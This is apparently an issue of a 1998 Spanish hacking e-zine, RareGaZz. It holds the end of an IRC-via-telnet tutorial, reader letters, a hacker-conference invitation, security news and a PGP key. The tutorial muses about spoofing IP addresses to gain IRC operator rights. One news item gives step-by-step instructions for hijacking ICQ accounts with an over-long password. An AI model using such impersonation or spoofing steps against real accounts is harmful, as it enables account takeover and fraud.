:Rommel!Granuja@ppp194.197.redestb.es PRIVMSG #mexicano :yo no lo hubiera dich
o mejor....
:Thays!yo@194.224.193.186 PRIVMSG #mexicano :que sabemos lo que se pierde
:Mendes!IRcap.49@195.53.104.197 JOIN :#mexicano
:Mendes!IRcap.49@195.53.104.197 NICK :Mefisto

En este log puedes ver que cuando te unes a un canal te sale una lista con
la gente que hay en el canal, y te envian el NOTICE del canal.
Tambien se puede ver al final como entra un nuevo usuario (Mendes) al canal.

Mas cosas....
Ya nos hemos conectado al servidor IRC y estamos dentro de un canal, y
ahora el paso logico es chatear!.
El comando para enviar mensajes es PRIVMSG
PRIVMSG destino1,destino2,.. Mensaje

En destino puedes poner un nick o un canal o una lista de ellos.
El mensaje ha de ir precedido por los dos puntos (:)
Ej:
	PRIVMSG pepe :Hola pepe me recibes?
	PRIVMSG #amor :Busco chica para relacion formal...

Creo que se pilla el concepto no?

Bueno voy a dejarme de chateo y voy a ver que hay por ahi...
Prueba a darle al comando HELP, te saldra algo como:
help
:fenix.irc-hispano.org NOTICE pep_1 :PRIVMSG
:fenix.irc-hispano.org NOTICE pep_1 :NICK
:fenix.irc-hispano.org NOTICE pep_1 :NOTICE
:fenix.irc-hispano.org NOTICE pep_1 :JOIN
:fenix.irc-hispano.org NOTICE pep_1 :MODE
:fenix.irc-hispano.org NOTICE pep_1 :QUIT
:fenix.irc-hispano.org NOTICE pep_1 :PART
:fenix.irc-hispano.org NOTICE pep_1 :TOPIC
			.
			.
		Un monton de comandos mas.....
			.
			.
:fenix.irc-hispano.org NOTICE pep_1 :INVITE
:fenix.irc-hispano.org NOTICE pep_1 :KICK
:fenix.irc-hispano.org NOTICE pep_1 :WALLOPS
:fenix.irc-hispano.org NOTICE pep_1 :PING
:fenix.irc-hispano.org NOTICE pep_1 :PONG
:fenix.irc-hispano.org NOTICE pep_1 :SILENCE
:fenix.irc-hispano.org NOTICE pep_1 :GLINE
:fenix.irc-hispano.org NOTICE pep_1 :NOTE
:fenix.irc-hispano.org NOTICE pep_1 :SERVICE
:fenix.irc-hispano.org NOTICE pep_1 :HASH
:fenix.irc-hispano.org NOTICE pep_1 :DNS
:fenix.irc-hispano.org NOTICE pep_1 :REHASH
:fenix.irc-hispano.org NOTICE pep_1 :RESTART
:fenix.irc-hispano.org NOTICE pep_1 :DIE

Estos son los comandos que tiene implementados el servidor de IRC.

Si has leido hasta aki te preguntaras, y para que quiero yo conectarme al
IRC con el telnet??? Si con mi cliente me complico menos la vida!
Pues para aprender, solo eso. Ademas si algun dia te interesa programar un
cliente para IRC, necesitaras saber como funciona no?
Ademas, si echamos a volar un poco la imaginacion... si tenemos la IP de un
operador, y enviaramos paquetes con ordenes con la ip del operador.. no
tendriamos sus privilegios? podriamos ser operadores en todos los canales...
incluso podriamos ser IrCops haciendonos pasar por ellos falseando nuestra
ip, no?
Pero esto plantea nuevos problemas... hay que averiguar desde que puertos se
conecta el operador, el servidor que usa, los numeros de secuencia de los
paquetes tal vez?
Esto os lo dejo a vuestra imaginacion.
Hay muchisimos mas comandos en IRC, pero con esto que he contado tienes
suficiente para empezar a experimentar.
Si a alguien le interesa el tema hare una segunda entrega con explicacion a
mas comandos y un pokito mas del tema del spoofing en irc, asi que mandadme
mails si os interesa todo esto.

Tengo que agradecer a jcl que me despertara el interes sobre el tema del IRC
que era algo que tenia completamente apagado...

Si os interesa el tema mi email es: senpai@cyberdude.com  ahi podeis enviar
vuestras sugerencias y criticas a mi articulo (esta hecho en un tiempo record
de 30 minutos asi que seguro que tiene fallos).

Para profundizar mas sobre el tema os recomiendo que os leais la RFC 1459.

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

                       */*\/*\/*\/*\/*\/*\/*\*
		      /                       \
		    *|*   CARTAS DEL LECTOR   *|*
		    *|*   -----------------   *|*
		      \                       /
		       *\*/\*/\*/\*/\*/\*/\*/*

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  A parte de felicitarles por su revista, y decirles ke se den un paseito
  por el web de abajo del todo (si el ke pone Necronomicon...), y se miren
  la Guia de Temas Olvidados y se meten a Aadir un Enlace y me rellenen
  el formulario, porke me gustaria ponerles un link en esa seccion dentro
  de Red, pero no se ke descripcion ponerles. Asi ke solo dense una vuelta
  me envian el formulario y chapooo...

  Pasando al tema ke keria comunicarles... Seguro ke no conocian la
  existencia de la Red de IRC Union Latina, pero fijo ke si conocian el
  IRC-Hispano. Pues nada pasarles los servers de la Red de IRC Union
  Latina:

  Union Latina: Comunet (ES, Bilbao): comunet.unionlatina.org
  Union Latina: Digital (ES, Madrid): madrid.unionlatina.org
  Union Latina: Dragonet (ES, Alicante): dragonet.unionlatina.org
  Union Latina: Interlink (ES, Madrid): interlink.unionlatina.org
  Union Latina: Lander (ES, Madrid): lander.unionlatina.org
  Union Latina: Telebase (ES, Alicante): telebase.unionlatina.org
  Union Latina: Tinet (ES, Tarragona): tinet.unionlatina.org

  Su web oficial es:

  http://www.unionlatina.org

  Y el Bot de esta Red es KaOs. Ke porke les interesaria esta red????...
  pueee. porke es una red alternativa al IRC-Hispano y no hay IRCops
  fascista como en la otra... Aunke es una pena antes habia un server de
  Mexico y otro de Puerto Rico, pero se han caido y no creo ke vuelvan...
  Por  cierto si conocen por alla el otro lado del charco, algun server ke
  pudiera unirse a Union Latina comunikenmelo ke yo se lo digo a un par de
  IRCops... Siguiendo con el tema... pues ke keremos ke esta sea la red
  donde hablen todos los hispanos del mundo... asi ke ya saben  a darse
  una vuelta por la red...

  Pueee nada maxxxx... espero ke si pueden lo comuniken en su e-zine, pa
  ke la gente sepa ke hay otras redes Hispanas aparte del IRC-Hispano...

  Ale... ke sigan tan bien con su e-zine... y ke no decaigan...

  Mushas GraciaX por todo... se despide un espaolito de ustedes...


  [ Tomad nota todos los IRCmaniacos ... seguro que la red latina esta
    genial ... no lo olvideis ... ]

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  amigos de RareGazz :

  HIzes desde ARGENTINA

  La presente es para solicitar autorizacion para difundir su fantastica
  revista en mi web ------> members.xoom.com/rifoxxx

  Esta de mas decir q es una de las mejores del MUNDO y que he aprendido
  mucho con ella


  [ Pues claro!!!! Todo el que quiera tener nuestro e-zine en su web que nos
    mande un mail indicandonos la ruta exacta de donde esta cada numero y lo
    publicaremos como mirror en nuestra seccion de magazines ]

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			UnderCon  II
		Octubre de 1998 Murcia/Espaa
			-Invitacion-

  Fecha:
  ------
  Primer fin de semana de Octubre. Viernes 2, Sabado 3 y Domingo 4.

  Lugar:
  ------
  Murcia capital. Punto de contacto CyberCafe Java.
  La forma de llegar es muy sencilla tanto en coche, autobus, tren e incluso
  avion.

  Condiciones:
  ------------
  - Cada grupo invitado contara con una persona de contacto que se encargara
    de enviarle la invitacion, solucionarle dudas, y guiarle por la ciudad.
  - Para mantener un nivel aceptable de asistencia, solo se permitira la entrada
    de personas invitadas y acompaantes. (Identificados mediante la tarjeta
    que tendreis que imprimir y rellenar, y que os sera enviada junto a esta
    correo)
  - No tenemos previsto cobrar entrada, salvo si es necesario cubrir los pocos
    costes que el evento pueda originar.
  - Comida y alojamiento son de libre eleccion, la organizacion aportara un
    local en el que se pueda dormir (Con sacos de acampada) y recomendara
    restaurantes donde comer, aunque se podra libremente optar por otras
    alternativas.
  - No se tiene previsto disponer de sitio para colocar ordenadores, aunque
    los equipos portatiles seran bienvenidos.
  - Disponer de un telefono movil sera recomendable a la hora de mantener el
    contacto.

  Contenido:
  ----------
  - Los dos temas centrales del congreso seran el phreaking y el hacking,
    aunque tambien se trataran temas como programacion de virus, ingenieria
    inversa, carding, etc...
  - Se impartiran una serie de conferencias, tanto por oradores locales como
    por cualquier invitado que se sienta capaz.
  - Se organizaran los habituales debates y tertulias, donde conocer a la
    gente. Este ao intentaremos dividir a la gente en grupos para evitar la
    masificacion de oradores.
  - Tal vez si el tiempo lo permite se organice algun concurso, trivial-hack,
    lanzamiento de moviles, etc...
  - El sabado noche se organizara un ruta turistica por los garitos de la
    ciudad.

  Conferencias:
  -------------
  -Introduccion a las redes X25 por Dark Raver
  -Seguridad en comunicaciones inalambricas por CPNE
  -DNS spoofing Fatuo & Dark Raver
  -Chaping por TDD
  -Contratacion de un numero 900s en Espaa por Fatuo & Warezzman
  -Cualquier otra que los invitados esten dispuestos a dar.

  Grupos Asistentes:
  ------------------
  -RareGaZz   :)
  -CPNE
  -KTD
  -TDD
  -Hispahack
  -Com30
  -NPT
  -Vieja Guardia
  -29A
  -etc...

  Consultas:
  ----------
  Es muy recomendable confirmar la asistencia con antelacion. Asi que incluso
  aunque no tengais dudas, seria muy importante que escribais un pequeo
  mensaje a la siguiente direccion: informacion.undercon98@usa.net

  Es tambien muy importante que contacteis con vuestra persona de contacto
  para solucionar todos los detalles de vuestra asistencia.

  Esta invitacion puede ser distribuida entre todos aquellos posbiles
  interesados en el tema, siempre que sean de vuestra confianza y pudean
  aportar su experiencia al evento.

  Recomendamos maxima discrecion a la hora de comentar este tema.

  Mas detalles os seran dados en un mensaje de vuestra persona de contacto,
  en el que tambien recibireis el gif de la tarjeta de identificacion que
  necesitareis imprimir y rellenar, y que hara las veces de invitacion.

  Saludos


  [ Pues si alguno quiere ir que me envie un mail a guybrush@cyberdude.com
    para que le de la invitacion correspondiente. Yo fui el ao pasado y este
    voy a repetir ... no os lo podeis perder!! ]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

			    =-_-=-_-=-_-=-_-=
			   |                 |
			   |    NOTILOONZ    |
			   |    ---------    |
			   |  _   _   _   _  |
			    =- -=- -=- -=- -=
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			Novedades en el caso Vesatec
			----------------------------

  El  caso mas  reciente y  bochornoso contra  la libertad  de expresion  en
  Internet  da un  paso importante  hacia adelante... la  sede central de la
  BaSurA (BSA),  ha decidido  cerrar la sucursal de Barcelona, prescindiendo
  de  su colaborador el  Sr. X.  Ribas, hasta ahora conocido como el Abogado
  Anti-Pirateria... jejjejejej, como se le conocera ahora?
  Las malas  lenguas dicen  que desde que se incorporo el nuevo  director de
  Microsoft  Espaa (recordemos  que la  mayor parte  de la BSA, pertenece a
  esta  empresa), las  cosas han  cambiado mucho,  y supongo  que al revisar
  nuestro  caso, informaron  a cierta  persona en  Redmond, que  no le haria
  mucha  gracia, coincidiendo  con su  visita a  Lisboa (el mismo dia que yo
  cumplo  ao, el 9/9)  y su  posible visita  a Espa a posterior,  pues han
  decidido limpiar un poco en casa.

  Por  cierto segun  fuentes de  toda solvencia,  el caso Vesatec, aparte de
  otro de similares caracteristicas ocurrido en Italia en fechas antes de lo
  nuestro (y  que por cierto se resolvio a favor de los acusados), es uno de
  los mas importantes  de Europa,  y esta en la mira de buffettes abogaciles
  muy prestigiosos.

  Teneis toda la informacion del suceso en http://bsatec.org

  Salu2
  Angeloso

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

	      Ampliarian el caso judicial de microsoft
	      ----------------------------------------

  El Departamento  de Justicia  de los  Estados  Unidos  y  los 20  estados
  norteamericanos  que estan demandando  a Microsoft  planean  aumentar  la
  presion sobre  la empresa de  Bill Gates al incluir alegatos sobre nuevas
  presuntas  practicas monopslicas y  dainas  por  parte del  gigante  del
  software.  Las nuevas  acusaciones podrian  ser presentadas  hoy mismo  e
  incluirian evidencia que  demostraria que Microsoft presiono a Intel para
  que   no  tuviera  en  cuenta  el  software  de  su  competidor  Netscape
  Communications, que  manipulo su  sistema operativo  Windows para  que no
  pueda trabajar  con productos de otras firmas, y que intento dividirse el
  mercado del software de audio y video con Apple Computer, de acuerdo a lo
  publicado  por el Seattle Times. Segun estipula la ley norteamericana, el
  gobierno y los estados solo pueden incluir nueva evidencia en caso de que
  la misma esta relacionada  con los  cargos antes presentados. El juez que
  entiende en la causa, ahora debera determinar si la nueva evidencia puede
  ser  tenida en  cuenta para  el juicio  que  comenzara  el proximo  23 de
  septiembre.

  http://www.news.com/News/Item/0,4,25858,00.html?st.ne.4.head

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

	Nuevo sistema para acceder a los E-Mails sin encender el PC
	-----------------------------------------------------------

  Un novedoso servicio de notificacion de emails original de Israel que esta
  desembarcando en los Estados Unidos propone una pratica manera de chequear
  el  correo electronico.  MailPush, como  es  conocido  el  nuevo  sistema,
  permite  a los  usuarios con  cuentas de  email acceder  a  sus mensajes a
  traves de faxes,  telefonos, celulares  o pagers sin la necesidad de estar
  en  permanente contacto  con sus  computadoras. El  sistema,  que  tambien
  notifica  a quien  envia el mensaje  que sus emails llegaron a destino, es
  ofrecido  directamente a traves  de Internet por una unidad de Cellcom, la
  empresa de telefonia celular mas grande de Israel. MailPush tambien planea
  distribuir  el servicio  a traves  de las empresas proveedoras de Internet
  (ISP), al mismo tiempo que no descartan implementarlo  en forma  directa a
  traves de las  compaias de  telefono. Marc Schechtman,  vicepresidente de
  MailPush, manifesto  que proyectan  que "de  aqui a  un ao,  el 5% de los
  usuarios norteamericanos  de Internet  se suscriban  al  servicio",  y que
  planean llevarlo a otros 20 paises en un futuro cercano.

  http://www.news.com/News/Item/0,4,25856,00.html?st.ne.1.head

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       Microsoft recharo las acusaciones de Sun con respecto a Java
       ------------------------------------------------------------

  A traves  de un documento  presentado  ante la corte  que interviene en el
  caso  el viernes pasado, Microsoft  rechazo  energicamente  las intimacion
  preliminar presentada  por Sun Microsystems en su contra alegando  que una
  accion de ese tipo "causaria no solo un gran dao a Microsoft sino tambien
  a sus distribuidores,  revendedores, desarrolladores de software e incluso
  a  los propios  usuarios". En  el mes de mayo, Sun presento una intimacion
  preliminar argumentando  que el Windows 98 incluye una version de Java que
  es incompatible con la desarrollada  por ellos, por lo que solicita que se
  obligue a Microsoft a incluir  la version de  Sun en  el flamante  sistema
  operativo  y que se  le impida a  la compaia  de Bill Gates distribuir el
  Visual  6.0  hasta  tanto  no  sea  totalmente  compatible  con la version
  standard  del Java  de Sun. En su descargo realizado el viernes, Microsoft
  manifesto que no solo la empresa cumplio  con la licencia  sobre Java  que
  mantiene con Sun,  sino que todos  sus productos  son  compatibles con  el
  sistema en cuestion.

  http://www.techweb.com/wire/story/TWB19980828S0001

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

	Una falla en Hotmail expuso los password de los usuarios
	--------------------------------------------------------

  El proveedor  de mail  gratuito de  Microsoft admitio  que esta intentando
  reparar el problema originado en el servicio de correo de Hotmail, el cual
  permitio que programadores malintencionados de JavaScript pudieran alterar
  y vulnerar los passwords de los usuarios. El problema se detecto cuando la
  empresa  Specialty Installations publico  una demostracion del mismo en su
  site  "Porque  Podemos",  el   cual  esta  dedicado   a  los   trabajos  e
  investigaciones  no rentadas  de los  programadores de  paginas web  de la
  compaia canadiense. Apodado "Hot" Mail,  la muestra consta de un mail que
  contiene  el   denominado  Caballo  de  Troya,  un  sistema  que altera la
  interface de  los usuarios  con Hotmail.  Una vez modificada la interface,
  cualquier  comando que se ejecuta produce un mensaje falso por "expiracion
  de tiempo",  y pide que  se reingrese el nombre y password. Al cumplir con
  la requisitoria, el usuario  retorna al  site standard de Hotmail, pero el
  nombre y  la clave  personal en  ese momento  llegan a  las manos  de  los
  delincuentes  o, en  este caso de demostracion, a Specialty Installations.
  Sean  Fee,   ejecutivo  de   Hotmail,  manifesto   que  estan   trabajando
  intensamente  ya que  "la  proteccion de  los mails  y las  cuentas de los
  clientes son de vital importancia para la compaia".

  http://www.news.com/News/Item/0,4,25620,00.html?st.en.fd.gif.f

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			    Bug del ICQ
			    -----------

  Un tipo  Zachary Allison,  ha logrado  traspasarla seguridad  del ICQ  y
  hacerse pasar  por cualquier  usuario. Esta  persona ha echo un clon del
  icq pero  para linux,  el zICQ, para linux, tomando las fuentes del mICQ
  y modificandolas,  pero  este no tiene  la  limitacion  de pass  del  de
  Mirabilis, ya que este permite pass de mas de 8 caracteres, al contrario
  que  el oficial  que solo  permite 8, y aqui esta el fallo que permite a
  un usuario  suplantar a otro previo conocimiento de su UIN, si mandas un
  pass de  mas de 8  caracteres el buffer  de los servidores falla y te da
  acceso como el UIn que le digas.

  Primero se debe bajar el zICQ en: http://hookah.ml.org/zicq

  Usa tu  programa ICQ  para ver si el usuario legitimo esta conectado, si
  asi es espera que se desconete.

  Conecta con el zICQ, da el UIN que quiereas y el pass "123456789"

  El autor  dice que  esto no es spoofing, que simplemente estas conectado
  como el usuario seleccionado y que puedes recibir y mandar mensajes como
  si fueras el.

  Funcionara siempre y cuando otro UIN no se haya logueado como el UIN por
  el que te vas a hacer pasar..

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

		   Bug del E-Mail del Netscape y del Outlook
		   -----------------------------------------

  Dos  investigadores de  la Universidad  finlandesa  de Oulu, Ari Takanen y
  Marko Laakso, han  descubierto  un fallo de  programacion en los programas
  gestores  de correo  electronico  de Netscape y  Outlook de Microsoft, que
  permitirman a intrusos informaticos con malas intenciones destruir o robar
  documentos  e  insertar  diferentes  virus  en  nuestro  ordenador.  Tanto
  Netscape como Microsoft han  confirmado el hecho y han empezado a elaborar
  contrareloj "parches" o programas que corrijan el defecto.

  El defecto  o "bug" se  produce sin necesidad de abrir el mensaje, lo cual
  ha disparado  la alarma en  la comunidad de Internet, pues hace revivir un
  viejo fantasma que  asolo la red en los primeros aos, cuando se penso que
  la recepcion de un simple mensaje de correo electronico podria servir para
  que  alguien  entrara  en  nuestro  ordenador.  Algunos  desaprensivos  se
  encargaron  a lo  largo de  los ultimos  aos  de mantener  vivo el temor,
  lanzando falsas ideas  del tipo de "si usted abre un mensaje que lleve por
  titulo  "Win  a  holiday"  o "Good  times"  infectara  automaticamente  su
  maquina".

  La noticia  hoy es que existe la posibilidad de que simplemente recibiendo
  un correo con  un archivo  adjunto, uno puede perder el control del propio
  ordenador. Cuando el fichero adjunto lleva un nombre extremadamente largo,
  con una extension  superior a la que admite el sistema, el programa lector
  de correo  se queda "colgado". Pero  antes de ello, al parecer, se ejecuta
  el fichero en cuestion, que  puede consistir en un virus o, por poner otro
  ejemplo, en un programa para copiar el contenido del disco duro y enviarlo
  por  la red.  Uno de  los mayores  expertos en  seguridad en  Espaa, Jose
  Manuel Gomez, coordinador del sitio web Kriptspolis,http://kriptopolis.com
  en el  que se  da una  amplia informacion  del tema,  ha asegurado  en  su
  boletin   que  "los   usuarios  estan  ahora   desprotegidos  y,  dada  la
  implantacion de  los programas de  correo, tenemos al diablo sentado en la
  mesa".

  Sin embargo, a pesar de la convulsion, el modo  concreto de  explotar este
  "bug"  aun no  ha sido  difundido. Tampoco  han  trascendido  noticias  de
  ataques. Netscape  ha se alado que  en los  proximos dias  difundira  una
  version que evite el problema, mientras Microsoft ha recomendado que no se
  lean los mensajes con ficheros adjuntos de comunicantes desconocidos.
  Netscape ha pedido  que "bajo  ninguna circunstancia  se active el menu de
  Archivo  cuando  el  mensaje  esta  seleccionado".  Ambos  fabricantes  de
  software  sugieren visitas periodicas a sus paginas dedicadas a seguridad,
  pues tan pronto tengan el "antidoto" lo difundiran.

  La fuerte  competencia entre  los navegadores  ha llevado  a  ambas firmas
  rivales a comercializar software con errores tan  graves como estos, segun
  coinciden diversos  programadores  consultados por  nuestro  diario.  Como
  fuente de informacion adicional, se recomienda News.com,  asi como el foro
  mas  prestigioso  de  la  red  en   cuestiones  de  "bugs"  y  errores  de
  programacion: http://www.ntbuqtraq.com,dsd.

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			    Bug del Windows 98
			    ------------------

  Aparentemente el  Windows 98  tiene un  bugs que funciona de la siguiente
  manera. El  mal llamado sistema  operativo (para mi  software de sistema)
  parece que  se resetea  solo, a  determinada hora  de determinados  dias.
  Parece que entre las 23:59 Hs. y las  24:00 Hs. (0:00 Hs.) del dias 31 de
  diciembre de cada ao, dicho software se reinicia, solo sin ningun motivo
  aparente y  sin previo aviso, como si se hubira pulsado la tecla Reset de
  la CPU.

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

		  La RareDudeZz esta cerca de los 500 usuarios
		  --------------------------------------------

  La lista de correo  de RareGaZz (mas conocida  por RareDudeZz) comenzo  a
  funcionar  con la  unica intencion  de  avisar a nuestros lectores de las
  apariciones  de nuevos  numeros en nuestro e-zine, pero se ha convertido,
  gracias  a  todos, en  uno  de  los mayores  foros hispanos  sobre  temas
  underground.

  Hoy dia has cerca de 500 usuarios  suscritos y se recibe una  media de 20
  o 30 mails diarios.
				
  El tema principal de la lista es el Hacking pero  tambien se tratan otros
  temas y  se ayuda  a la  gente mas  iniciada, que  parece que  estan algo
  perdidos.

  Una vez  mas quiero  recordar  las  normas de la lista, las cuales podeis
  encontrar en la pagina principal de RareGaZz:

	- Formas de suscribirse:
		1- Rellenando el formulario de nuestra Web
		2- Enviando  un e- mail a  raregazz@iname.com poniendo en el
		   subject: 'suscribe direc@de.correo' donde direc@de.correo
		   es vuestra direccion de e-mail ... no me seais tan burros
		   de poner 'direc@de.correo' ... que ya han habido varios.
		3- Acceder  a la  pagina http://www.coollist.com  y rellenar,
		   abajo  del todo,  vuestros datos de  e-mail y  la lista de
		   correo  a la que  os  quereis suscribir;  en este caso, la
		   'raredudez' (sin comillas).

	- Formas de desuscribirse:
		1- Acceder  a la   pagina http://www.remove.coollist.com  y
		   rellenar vuestros datos de  e-mail y  la lista de correo
		   a la  que  os  quereis  desuscribir;  en  este caso,  la
		   'raredudez' (sin comillas).

	- Normas:
		* Las teneis todas en la  pagina principal de  nuestra Web.
		  Leerlas antes de suscribiros porque luego hay mucha gente
		  que rellena  el formulario  y pregunta ... que hago aqui?
		  que es esto? porque me mandais tantos mails? Joder!!!  no
		  sabeis leer?. Pues eso, que  leais bien las  normas antes
		  de suscribiros.

		* No preguntes tonterias. No quiero decir que la dudas de la
		  gente  iniciada sean  tonterias. Al  contrario,  para  eso
		  estamos!! pero  las preguntas  tipo: 'quiero  entrar en mi
		  colegio para cambiarme las notas, explicarme en breve como
		  lo  hago ... '.  $%&#@     merecen   ser  dados   de  baja
		  inmediatamente.

		* Puedes preguntar cosas sobre h/p/v/c, incluso  dudas sobre
		  configuracion  de Linux,  pero  ya  esta.  Tambien  puedes
		  comentar noticias o nuevos bugs.

		* Queda totalmente prohibido enviar attach en los mails (para
		  eso disponemos de un FTP anonimo).

	- Ventajas:
		* Si estas iniciandote todo son ventajas. Pero mejor primero
		  lee  y cuando te enteres mas ya escribiras. No digas cosas
		  de las que luego te vayas a arrepentir   :)

		* Te  enteraras de  cuando salen  nuevos numeros  de nuestro
		  e-zine, asi como de los e-zines de nuestros  compaeros de
		  SET y  de JJFhackers, que  estan haciendo tambien  un buen
		  trabajo.

		* Conoceras mas hackers, posiblemente de tu ciudad.

		* Quedadas 'secretas' en el IRC. Solo para RareDudeZz.

		* De  vez en  cuando hacemos  estudios sobre la seguridad de
		  algun  server. Para ver  los posibles  agujeros que  pueda
		  tener.

		* Disponemos de un FTP anonimo donde intercambiar  programas
		  interesantes (no comerciales - no WareZz).

		* Aunque sean  muchos mails, son cortos y sin attach, por lo
		  que en 5 minutos los tienes todos en tu ordenador.

	- Inconvenientes:
		* La lista no  esta moderada. Puedes recibir mails que no te
		  interesen (y que tendras que soportar sin insultar  y sin)
		  meterte  con nadie ...  sino, seras  borrado  un mes de la
		  lista. Esto lo  digo porque ya  hemos tenido algun  ligero
		  problemilla  de gente  muy 'guay'  que piensa  que algunas
		  preguntas son  muy 'lamer' para  ellos. Por desgracia  hay
		  mucha gente asi. Te  lloran para que  les ensees cosas  y
		  luego, cuando han  aprendido 'algo', vacilan  con los  mas
		  newbies, en vez de ensearles. Y sino, leer el texto final
		  de Set 16 (extraido de un log del IRC) y ver como se creen
		  algunos que son 'guays' y resulta  que nada mas  que saben
		  'hablar'  y banear  a la  gente.  Seores,  ser  elite  no
		  consiste en conseguir 'op' en un  canal de hacking de IRC.

		* 20 o 30 mails diarios.

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			   Undercon en Monterrey????
			   -------------------------

  Hablando sobre la RareDudeZz, se ha estado discutiendo la posibilidad
  de  hacer  un  Undercon en Monterrey, Mexico, se  ve  que  hay  mucho
  entusiasmo y ganas de lograr hacerlo.

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			X-Ploit TEAM ataca de nuevo
			---------------------------

  El grupo mexicano de Crackers, clasificados asi por Rootshell, hizo de
  nuevo de las suyas en otro de los sites del gobierno mexicano, en esta
  ocasion  la  victima  fue www.sanpedro.gob.mx, que es un municipio del 
  estado de Nuevo Leon.

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			 RaZa MeXiCaNa TEAM
			 ------------------

  Los seores(as) que se reunen en un canal denominado #RaZa_MeXicaNa, de
  los servidores de Red Latina del IRC han sacado el numero 1 y 2  de  su
  boletin de seguridad, este boletin(muy bueno por cierto) lo puedes
  encontrar en:


		     http://www.BigFoot.com/~RaZa-Mexicana


[ L l a v e s  P G P ]

<<::RareGaZz::>> // raregazz@iname.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

mQGiBDV6jbIRBADl1IELaiXIUyKxED1if1YcTV6+d/flNE97cXC+nhFbfPKQ3oaj
ybIALWB3X9LhfbSc3uD5RTrHQcUATtYXRboMCUZe+OcI7dlndCsEyR1Jx9J49Qys
JbbjrPft9eWlA8SqEtSGaV8003phw09cWxhDu0LV/ijSngPpngjo+xsNJQCg/2qo
Ukocb3rX9hNNIjVb2a8SsjcD/2L6hM75g4KGY4qk2FlDWuoHivphn+ARO0fQCkmT
28UMf3dqktGXO5mn63mky/wjrTIjZd2w0jbeXIsyGFeD+1Bk3OGjJmds7j3pH8mP
jCvmoozX4MbHo5SbXi7MF4i/PNkcudlrXXZH/HAa6hBGqo7RHChFnZhxjfpvzX4Z
4BGCA/0ZTQyjqglnSPTyMPooMsi3QZZYZUIeKAcfYB1vuaf31X3CvKYlDLYF0qj4
5n15nIhyDHh3GwwlJJrdmOwmH/Fzn90mGn9xWpxD3Ou+qmvFLpn4RvupkupZkVJg
GJAfgDn+YnaVTeKqa+HME5RMzeKvIDHJVeXPf/JPe/RQg2kc6bQdUmFyZUdhWnog
PHJhcmVnYXp6QGluYW1lLmNvbT6JAEsEEBECAAsFAjV6jbIECwMBAgAKCRDzs12Y
6YPcYhezAKDpOa+ZYL9OzHv4DsryHl+yhwyXTwCeMQoUP8IDKHYycKV3aw9YCodC
Kze5BA0ENXqNsxAQAPkYoH5aBmF6Q5CV3AVsh4bsYezNRR8O2OCjecbJ3HoLrOQ/
40aUtjBKU9d8AhZIgLUV5SmZqZ8HdNP/46HFliBOmGW42A3uEF2rthccUdhQyiJX
Qym+lehWKzh4XAvb+ExN1eOqRsz7zhfoKp0UYeOEqU/Rg4Soebbvj6dDRgjGzB13
VyQ4SuLE8OiOE2eXTpITYfbb6yUOF/32mPfIfHmwch04dfv2wXPEgxEmK0Ngw+Po
1gr9oSgmC66prrNlD6IAUwGgfNaroxIe+g8qzh90hE/K8xfzpEDp19J3tkItAjbB
JstoXp18mAkKjX4t7eRdefXUkk+bGI78KqdLfDL2Qle3CH8IF3KiutapQvMF6PlT
ETlPtvFuuUs4INoBp1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZ
X9x2Uk89PY3bzpnhV5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56N
oKVyOtQa8L9GAFgr5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kj
